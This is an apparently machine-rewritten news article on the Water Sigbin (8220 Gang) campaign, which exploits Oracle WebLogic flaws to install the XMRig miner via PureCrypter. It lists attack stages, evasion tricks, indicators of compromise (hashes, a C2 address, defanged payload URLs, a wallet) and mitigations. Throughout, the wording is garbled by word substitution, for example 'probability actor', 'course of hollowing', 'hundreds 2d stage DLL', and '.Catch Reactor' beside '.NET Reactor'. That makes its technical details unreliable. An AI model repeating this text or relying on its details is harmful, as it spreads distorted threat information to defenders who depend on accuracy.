Water Sigbin Hackers Exploit Oracle WebLogic Vulnerabilities

Cybersecurity researchers uncovered an advanced attack campaign by the Water Sigbin (aka 8220 Gang) probability actor that exploited vulnerabilities within the Oracle WebLogic Server, notably CVE-2017-3506 and CVE-2023-21839, to deploy the XMRig cryptocurrency miner on compromised programs.

The attack begins with the probability actor exploiting the WebLogic vulnerabilities to realize a malicious PowerShell script on the victim machine.

This script decodes a Base64-encoded payload, which initiates a multi-stage loading course of to reveal the PureCrypter loader and the XMRig miner.

Water Sigbin employs a total lot of superior tactics to evade detection:

• All payloads are safe the usage of .Catch Reactor, a code security system that obfuscates the code and contains anti-debugging measures
• The malware uses fileless execution tactics, comparable to DLL reflective injection and course of hollowing, to bustle the malicious code fully in memory
• The XMRig miner masquerades as reliable processes like cvtres.exe and AddinProcess.exe to dwell away from suspicion

Technical Analysis:

The attack entails just a few stages of payload decryption, decompression, and loading:

1. Initial PowerShell script decodes Base64 payload
2. Decoded payload (wireguard2-3.exe) decrypts and hundreds 2d stage DLL (Zxpus.dll) by capability of reflective injection
3. Zxpus.dll retrieves encrypted binary, decrypts it the usage of AES, decompresses with GZip, and deserializes to imprint next loader configuration
4. Loader creates cvtres.exe course of and injects next stage payload
5. cvtres.exe hundreds PureCrypter loader DLL (Tixrgtluffu.dll)
6. PureCrypter registers with C2 server and downloads final XMRig miner payload.

The malware collects system files like processor ID, disk power particulars, set in AV system, etc. the usage of WMI queries. This files is encrypted and despatched to the C2 server at 89.185.85[.]102:9091 for victim identification.

The malware employs fileless execution tactics, the usage of DLL reflective and course of injection. This allows the malware code to bustle fully in memory and dwell away from disk-based detection mechanisms.

The payloads primitive all over this campaign are safe the usage of .NET Reactor, a .NET code security system, to safeguard in opposition to reverse engineering. This security obfuscates the code, making it tough for defenders to fancy and replicate.

Moreover, it contains anti-debugging tactics. The attack begins with the exploitation of CVE-2017-3506, which deploys a PowerShell script on the compromised machine.

This script decodes the first stage Base64-encoded payload and stores the decrypted response in a registry key below the subkey route HKEY_CURRENT_USERSOFTWARE.

Per Trend Micro anecdote, The malware then downloads an encrypted file named plugin3.dlland decrypts it the usage of the TripleDES algorithm and decompresses it with Gzip.The loader creates a brand recent course of named AddinProcess.exe to impersonate a reliable course of, the usage of course of injection to load the XMRig payload into memory and begin the recent course of.

The final payload is XMRig, a smartly-liked open-source mining system that supports just a few working programs. It sends a mining login set a question to to a mining pool URL “217.182.205[.]238:8080” and a wallet address “ZEPHYR2xf9vMHptpxP6VY4hHwTe94b2L5SGyp9Czg57U8DwRT3RQvDd37eyKxoFJUYJvP5ivBbiFCAMyaKWUe9aPZzuNoDXYTtj2Z.c4k”.

Indicators of Compromise

e6e69e85962a402a35cbc5b75571dab3739c0b2f3861ba5853dbd140bae4e4da
f4d11b36a844a68bf9718cf720984468583efa6664fc99966115a44b9a20aa33- Ransom_Blocker.R002C0XFC24
0bf87b0e65713bf35c8cf54c9fa0015fa629624fd590cb4ba941cd7cdeda8050- TROJ_FRS.VSNTFH24
b380b771c7f5c2c26750e281101873772e10c8c1a0d2a2ff0aff1912b569ab93- TROJ_FRS.0NA104FH24
2e32c5cea00f8e4c808eae806b14585e8672385df7449d2f6575927537ce8884- Trojan.MSIL.EXNET.VSNW11F24

[URL/IP address]
89[.]169[.]52[.]37
http://87[.]121[.]105[.]232/bin.ps1
http://79[.]110[.]49[.]232/plugin3.dll

Mitigation:

Trend Micro advises organizations to implement security simplest practices like authorized patching, remarkable uncover entry to controls, security assessments, and employee awareness practising to protect in opposition to such threats. Particular suggestions contain:

• Reduction programs and system updated with most favorite security patches
• Exercise stable authentication systems like multi-factor authentication
• Generally scan for vulnerabilities
• Educate workers on security simplest practices
• Exercise endpoint detection and response solutions to detect malicious verbalize

By exploiting WebLogic vulnerabilities, the usage of superior evasion tactics, and deploying XMRig miners, the Water Sigbin probability actor has all all over again demonstrated its technical sophistication.